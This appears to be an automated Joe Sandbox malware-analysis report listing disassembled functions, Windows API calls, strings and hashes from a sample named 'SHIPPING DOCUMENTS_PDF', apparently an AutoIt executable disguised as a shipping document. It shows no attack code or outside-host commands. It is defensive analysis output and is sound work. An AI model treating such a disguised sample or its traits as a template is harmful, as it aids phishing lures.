                                                                                      • Part of subcall function 00BDA8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00BDA9C5
                                                                                      • Part of subcall function 00BDA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00BDA9ED
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                    • String ID:
                                                                                    • API String ID: 3521893082-0
                                                                                    • Opcode ID: 2177ca3ad1bfeb5748aff4fce3c14dcb909dfee15eabc82f044bef42c2e5b17b
                                                                                    • Instruction ID: d2da2d31ec493ff8b467935bbb80c93608f88d355a38ff54984dc53edadb479f
                                                                                    • Opcode Fuzzy Hash: 2177ca3ad1bfeb5748aff4fce3c14dcb909dfee15eabc82f044bef42c2e5b17b
                                                                                    • Instruction Fuzzy Hash: 77916F72409302EFC7109F64DC48A6BBBE9FB48325F144A2AF962971A0EB71D944CB52
                                                                                    Function 00B52C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DestroyWindow.USER32(?,?,?), ref: 00B52CA2
                                                                                    • DeleteObject.GDI32(00000000), ref: 00B52CE8
                                                                                    • DeleteObject.GDI32(00000000), ref: 00B52CF3
                                                                                    • DestroyIcon.USER32(00000000,?,?,?), ref: 00B52CFE
                                                                                    • DestroyWindow.USER32(00000000,?,?,?), ref: 00B52D09
                                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 00B8C43B
                                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00B8C474
                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00B8C89D
                                                                                      • Part of subcall function 00B51B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B52036,?,00000000,?,?,?,?,00B516CB,00000000,?), ref: 00B51B9A
                                                                                    • SendMessageW.USER32(?,00001053), ref: 00B8C8DA
                                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00B8C8F1
                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00B8C907
                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00B8C912
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                    • String ID: 0
                                                                                    • API String ID: 464785882-4108050209
                                                                                    • Opcode ID: 64ae7affe72a2ad6a817bd35cb05a8fb216b773d6c0584252a68b97c6856e45b
                                                                                    • Instruction ID: 53716d761b3c028f331b0d2f8d165062c9095c47c6d95b7663a5c24fd56fa7bb
                                                                                    • Opcode Fuzzy Hash: 64ae7affe72a2ad6a817bd35cb05a8fb216b773d6c0584252a68b97c6856e45b
                                                                                    • Instruction Fuzzy Hash: B4129E70205201DFDB15EF24C894BA9BBE1FF05301F5445EAE99ACB662DB31EC45CBA1
                                                                                    Function 00BC74AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DestroyWindow.USER32(00000000), ref: 00BC74DE
                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00BC759D
                                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00BC75DB
                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00BC75ED
                                                                                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00BC7633
                                                                                    • GetClientRect.USER32(00000000,?), ref: 00BC763F
                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00BC7683
                                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00BC7692
                                                                                    • GetStockObject.GDI32(00000011), ref: 00BC76A2
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00BC76A6
                                                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00BC76B6
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BC76BF
                                                                                    • DeleteDC.GDI32(00000000), ref: 00BC76C8
                                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00BC76F4
                                                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 00BC770B
                                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00BC7746
                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00BC775A
                                                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00BC776B
                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00BC779B
                                                                                    • GetStockObject.GDI32(00000011), ref: 00BC77A6
                                                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00BC77B1
                                                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00BC77BB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                    • API String ID: 2910397461-517079104
                                                                                    • Opcode ID: 95b1f0f0ac429dfdc6f81091d99e6cfb77b2263c70085e2134ae19c27e91e40f
                                                                                    • Instruction ID: b55ae31a7babccc080d319ea2e52a01bc9d1a43ed451d0f42953288dbbddf48e
                                                                                    • Opcode Fuzzy Hash: 95b1f0f0ac429dfdc6f81091d99e6cfb77b2263c70085e2134ae19c27e91e40f
                                                                                    • Instruction Fuzzy Hash: 44A17EB1A40615FFEB14DBA4DC4AFAEBBB9EB45710F048155FA15A72E0DB70AD00CB60
                                                                                    Function 00BBAD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00BBAD1E
                                                                                    • GetDriveTypeW.KERNEL32(?,00BDFAC0,?,\\.\,00BDF910), ref: 00BBADFB
                                                                                    • SetErrorMode.KERNEL32(00000000,00BDFAC0,?,\\.\,00BDF910), ref: 00BBAF59
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$DriveType
                                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                    • API String ID: 2907320926-4222207086
                                                                                    • Opcode ID: 745a2df4bf8a6feacee0d134a6adac31d850f1e4efbd1c3ac9aed2e1dae99046
                                                                                    • Instruction ID: 1a89923056b557a92e7978ce2d3c73ea7de2f39d027447d21a34d554fae210ab
                                                                                    • Opcode Fuzzy Hash: 745a2df4bf8a6feacee0d134a6adac31d850f1e4efbd1c3ac9aed2e1dae99046
                                                                                    • Instruction Fuzzy Hash: 765142B0A48605DBCB10EB10C9A2DFD73E1EB4871172480E6F847E76D1DEB19D49EB52
                                                                                    Function 00B568DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: __wcsnicmp
                                                                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                    • API String ID: 1038674560-86951937
                                                                                    • Opcode ID: b6c725159f0fbf3c81ac3916858a07708517471fb5b3f00328ec8bf4141002c9
                                                                                    • Instruction ID: e4be2d7e57e9fbe91780a8bd294162ec816080e3432789c5375c8a17723cc2a3
                                                                                    • Opcode Fuzzy Hash: b6c725159f0fbf3c81ac3916858a07708517471fb5b3f00328ec8bf4141002c9
                                                                                    • Instruction Fuzzy Hash: 918117B0600206AACB25BB60DC82FBE37E8EF15701F4440E5FD15AB1E2EB60DE49D360
                                                                                    Function 00BD9A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00BD9AD2
                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00BD9B8B
                                                                                    • SendMessageW.USER32(?,00001102,00000002,?), ref: 00BD9BA7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window
                                                                                    • String ID: 0
                                                                                    • API String ID: 2326795674-4108050209
                                                                                    • Opcode ID: 381cc0db43800db27a9fc02bb2285f22694c3abc41f398209b112b942d811c58
                                                                                    • Instruction ID: 14d7617e66eba9640eea0fde3a00c1d0160ffab5a8398251899a9f885d0e23cc
                                                                                    • Opcode Fuzzy Hash: 381cc0db43800db27a9fc02bb2285f22694c3abc41f398209b112b942d811c58
                                                                                    • Instruction Fuzzy Hash: FF02DE30109202AFE725CF14C898BAAFBE5FF49314F0485AEF999D63A1E734D944CB52
                                                                                    Function 00BDA8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetSysColor.USER32(00000012), ref: 00BDA903
                                                                                    • SetTextColor.GDI32(?,?), ref: 00BDA907
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00BDA91D
                                                                                    • GetSysColor.USER32(0000000F), ref: 00BDA928
                                                                                    • CreateSolidBrush.GDI32(?), ref: 00BDA92D
                                                                                    • GetSysColor.USER32(00000011), ref: 00BDA945
                                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00BDA953
                                                                                    • SelectObject.GDI32(?,00000000), ref: 00BDA964
                                                                                    • SetBkColor.GDI32(?,00000000), ref: 00BDA96D
                                                                                    • SelectObject.GDI32(?,?), ref: 00BDA97A
                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00BDA999
                                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00BDA9B0
                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00BDA9C5
                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00BDA9ED
                                                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00BDAA14
                                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00BDAA32
                                                                                    • DrawFocusRect.USER32(?,?), ref: 00BDAA3D
                                                                                    • GetSysColor.USER32(00000011), ref: 00BDAA4B
                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00BDAA53
                                                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00BDAA67
                                                                                    • SelectObject.GDI32(?,00BDA5FA), ref: 00BDAA7E
                                                                                    • DeleteObject.GDI32(?), ref: 00BDAA89
                                                                                    • SelectObject.GDI32(?,?), ref: 00BDAA8F
                                                                                    • DeleteObject.GDI32(?), ref: 00BDAA94
                                                                                    • SetTextColor.GDI32(?,?), ref: 00BDAA9A
                                                                                    • SetBkColor.GDI32(?,?), ref: 00BDAAA4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                    • String ID:
                                                                                    • API String ID: 1996641542-0
                                                                                    • Opcode ID: 9af3b756e762c2cc4524c3ef31da5d9696f2b200e94f0f3624027b86de1558b5
                                                                                    • Instruction ID: 44a976ad8fe89096131798a4da00953c13a2e5f5dee8c21ea8983322aab8dd1f
                                                                                    • Opcode Fuzzy Hash: 9af3b756e762c2cc4524c3ef31da5d9696f2b200e94f0f3624027b86de1558b5
                                                                                    • Instruction Fuzzy Hash: 9D516271905209FFDF109FA4DC48EAEBBB9EF08320F154166F912AB2A1EB759940CF50
                                                                                    Function 00BD89D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00BD8AC1
                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BD8AD2
                                                                                    • CharNextW.USER32(0000014E), ref: 00BD8B01
                                                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00BD8B42
                                                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00BD8B58
                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BD8B69
                                                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00BD8B86
                                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 00BD8BD8
                                                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00BD8BEE
                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00BD8C1F
                                                                                    • _memset.LIBCMT ref: 00BD8C44
                                                                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00BD8C8D
                                                                                    • _memset.LIBCMT ref: 00BD8CEC
                                                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00BD8D16
                                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00BD8D6E
                                                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 00BD8E1B
                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00BD8E3D
                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00BD8E87
                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00BD8EB4
                                                                                    • DrawMenuBar.USER32(?), ref: 00BD8EC3
                                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 00BD8EEB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                    • String ID: 0
                                                                                    • API String ID: 1073566785-4108050209
                                                                                    • Opcode ID: fb481b1cbc03cbb15474b766b5be366eb362c166809db60316453a1ec9670e94
                                                                                    • Instruction ID: d4e718c8e4e888817265762c4a33794c4ef2f8b9652b7805a936478b4efa176b
                                                                                    • Opcode Fuzzy Hash: fb481b1cbc03cbb15474b766b5be366eb362c166809db60316453a1ec9670e94
                                                                                    • Instruction Fuzzy Hash: 0CE16171905209AFDB219F54CC84EEEBBF9EF05711F1481A7F919AB290EB709980DF60
                                                                                    Function 00BD488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCursorPos.USER32(?), ref: 00BD49CA
                                                                                    • GetDesktopWindow.USER32 ref: 00BD49DF
                                                                                    • GetWindowRect.USER32(00000000), ref: 00BD49E6
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00BD4A48
                                                                                    • DestroyWindow.USER32(?), ref: 00BD4A74
                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00BD4A9D
                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BD4ABB
                                                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00BD4AE1
                                                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 00BD4AF6
                                                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00BD4B09
                                                                                    • IsWindowVisible.USER32(?), ref: 00BD4B29
                                                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00BD4B44
                                                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00BD4B58
                                                                                    • GetWindowRect.USER32(?,?), ref: 00BD4B70
                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00BD4B96
                                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00BD4BB0
                                                                                    • CopyRect.USER32(?,?), ref: 00BD4BC7
                                                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 00BD4C32
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                    • String ID: ($0$tooltips_class32
                                                                                    • API String ID: 698492251-4156429822
                                                                                    • Opcode ID: a88e865ab056742ad42228cbba01b0928f2b202b3c830c4a1c24666e258004d6
                                                                                    • Instruction ID: 7ae8b76c6124896e1e54e35cab04ad176b86c791ea281a2bc6dd30d803911865
                                                                                    • Opcode Fuzzy Hash: a88e865ab056742ad42228cbba01b0928f2b202b3c830c4a1c24666e258004d6
                                                                                    • Instruction Fuzzy Hash: 82B16C71608341AFDB04DF64C884B6AFBE4FF85314F00899EF9999B291EB71D805CB55
                                                                                    Function 00BB449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00BB44AC
                                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00BB44D2
                                                                                    • _wcscpy.LIBCMT ref: 00BB4500
                                                                                    • _wcscmp.LIBCMT ref: 00BB450B
                                                                                    • _wcscat.LIBCMT ref: 00BB4521
                                                                                    • _wcsstr.LIBCMT ref: 00BB452C
                                                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00BB4548
                                                                                    • _wcscat.LIBCMT ref: 00BB4591
                                                                                    • _wcscat.LIBCMT ref: 00BB4598
                                                                                    • _wcsncpy.LIBCMT ref: 00BB45C3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                    • API String ID: 699586101-1459072770
                                                                                    • Opcode ID: 02012feeac5ad031e5be92343169345a82257641616de263d549dc4e4032a865
                                                                                    • Instruction ID: 6322ca4e3f171953acfa8d369556025a98217f41446df7c95b11459bbcb71599
                                                                                    • Opcode Fuzzy Hash: 02012feeac5ad031e5be92343169345a82257641616de263d549dc4e4032a865
                                                                                    • Instruction Fuzzy Hash: C741E531A042057BDB10AB748C47EFF77FCEF45710F0480EAF919A6192EF759A0196A5
                                                                                    Function 00B527D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B528BC
                                                                                    • GetSystemMetrics.USER32(00000007), ref: 00B528C4
                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B528EF
                                                                                    • GetSystemMetrics.USER32(00000008), ref: 00B528F7
                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00B5291C
                                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00B52939
                                                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00B52949
                                                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00B5297C
                                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00B52990
                                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 00B529AE
                                                                                    • GetStockObject.GDI32(00000011), ref: 00B529CA
                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00B529D5
                                                                                      • Part of subcall function 00B52344: GetCursorPos.USER32(?), ref: 00B52357
                                                                                      • Part of subcall function 00B52344: ScreenToClient.USER32(00C157B0,?), ref: 00B52374
                                                                                      • Part of subcall function 00B52344: GetAsyncKeyState.USER32(00000001), ref: 00B52399
                                                                                      • Part of subcall function 00B52344: GetAsyncKeyState.USER32(00000002), ref: 00B523A7
                                                                                    • SetTimer.USER32(00000000,00000000,00000028,00B51256), ref: 00B529FC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
